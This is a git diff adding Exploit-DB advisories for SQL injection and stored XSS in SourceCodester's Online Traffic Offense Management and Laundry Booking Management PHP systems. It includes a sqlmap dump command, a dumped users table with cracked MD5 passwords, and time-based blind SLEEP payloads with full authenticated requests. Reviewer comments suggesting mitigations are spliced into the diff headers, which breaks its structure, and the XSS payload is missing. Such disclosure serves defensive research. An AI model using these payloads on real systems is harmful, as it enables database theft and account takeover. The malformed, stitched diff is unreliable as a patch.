diff --git a/exploits/php/webapps/50218.txt b/exploits/php/webapps/50218.txt
new file mode 100644
index 000000000..a6e3d2d14
--- /dev/null
+++ b/exploits/php/webapps/50218.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 19/08/2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## SQL Injection
+
+# Vulnerable page
+http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=
+
+#Vulnerable paramater
+The id paramater is Vulnerable to sqli
+
+#POC
+going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.
+
+Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
+Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10
+
+Using sqlmap with dump database
+sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump
+
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
+| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
+| 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 |
+| 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 |
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
\ No newline at end of file
diff --git a/exploits/php/webapps/50219.txt b/exploits/php/webapps/50219.txt
new file mode 100644
index 000000000..1c72d1198
--- /dev/null
+++ b/exploits/php/webapps/50219.txt
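Review bot: The write-up stops at the symptom and the table dump and never records the root cause or a fix, which is what a defender reading this entry needs. The two `num_rows` notices at lines 5 and 10 of `admin/drivers/manage_driver.php` suggest the `id` value is concatenated into the query and the result is used without checking for failure, so I would add a closing line such as `# Mitigation: bind id in a prepared statement (or cast it to int), check the query result before reading num_rows, and turn display_errors off`. The dumped `password` column holds 32-hex-digit hashes that resolved to `admin123` and `123`, which looks like unsalted MD5 and deserves its own line as a separate weakness. The cookie is written `PHPSESSIONID`, while entry 50219 in this same commit uses `PHPSESSID`; please confirm the name, and fix `Testeted` and `paramater` in the header.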
@@ -0,0 +1,95 @@
+# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection
+# Date: 2021-08-19
+# Exploit Author: Azumah Foresight Xorlali
+# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Description:
+Laundry Booking Management System 1.0 application is vulnerable to SQL
+injection via the "id" parameter, which was not properly checked on the
+[edit_user.php,edit_customer.php,edit_order.php] page.
+
+#Vulnerable Request when logged in as a user with Supervisor or Manager:
+POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7
+Content-Type: multipart/form-data;
+boundary=---------------------------851226474159708868105526498
+Content-Length: 1408
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+
+---
+Parameter: id (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND
+'voSh'='voSh
+---
+
+-----------------------------------------------------------------------------------------------------------------------
+
+
+#Vulnerable Request when logged in as Admin:
+POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1
+Content-Type: multipart/form-data;
+boundary=---------------------------17781030011592905058578147050
+Content-Length: 767
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+---
+Parameter: id (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND
+'GIau'='GIau
+---
+
+-----------------------------------------------------------------------------------------------------------------------
+
+#Vulnerable Request when logged in a Admin:
+POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18
+Content-Type: multipart/form-data;
+boundary=---------------------------167059892515401580571429373524
+Content-Length: 886
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+
+---
+Parameter: id (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND
+'wCli'='wCli
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/50220.txt b/exploits/php/webapps/50220.txt
new file mode 100644
index 000000000..31df17d9a
--- /dev/null
+++ b/exploits/php/webapps/50220.txt
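Review bot: Neither the title nor the description says that these three injections need an authenticated session, although every request carries a `PHPSESSID` cookie and the headings name the required role (Supervisor or Manager for `edit_user.php`, Admin for the other two); entry 50218 in this commit marks that with `(Authenticated)`, and the same suffix here, and in the matching `files_exploits.csv` description, would keep triage consistent. The requests are shown as POST with a `Content-Length` but no body, and several headers (`User-Agent`, `Referer`, `Content-Type`) are hard-wrapped onto a second line, so a short comment saying the body was omitted and the lines were wrapped would prevent misreading. The entry also lacks a remediation note; something like `# Mitigation: bind the id parameter in prepared statements in edit_user.php, edit_customer.php and edit_order.php` would fit after the description. The third heading reads `logged in a Admin`.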
@@ -0,0 +1,13 @@
+# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-19
+# Exploit Author: Azumah Foresight Xorlali
+# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step1: Log in to the application with any valid user credentials.
+Step2: Select User Management and click add new user.
+Step3: Fill the required details and type "" in the address box or you can it on a notepad and paste it into the firstname and lastname since it doesn't you to type special characters into those fields
+Step 4:Click on Submit
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 01e8367ba..19b801440 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
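Review bot: Step3 contains an empty string where the test input should be (`type "" in the address box`) and is missing words (`you can it on a notepad`, `it doesn't you to type`), so the entry does not say what was stored or how the result was observed; the markup was possibly stripped when the text was submitted. The same step implies that the firstname and lastname restriction is enforced only on keystrokes, since pasting gets past it, which is worth stating outright as missing server-side validation. I would add a line naming the affected fields and the fix, for example `# Mitigation: validate address, firstname and lastname on the server and HTML-encode them on output (htmlspecialchars)`. The steps are also numbered inconsistently (`Step3:` versus `Step 4:`).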
@@ -38017,6 +38017,7 @@ id,file,description,date,author,type,platform,port
 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php,
 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php,
 37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,webapps,php,
+50219,exploits/php/webapps/50219.txt,"Laundry Booking Management System 1.0 - 'Multiple' SQL Injection",2021-08-20,"Azumah Foresight Xorlali",webapps,php,
 37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
 37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
 37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
@@ -44093,6 +44094,7 @@ id,file,description,date,author,type,platform,port
 49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection",2021-05-07,"Tyler Butler",webapps,php,
 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php,
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,
+50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,
 49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,
 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php,
@@ -44344,3 +44346,4 @@ id,file,description,date,author,type,platform,port
 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php,
 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,
 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php,
+50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php,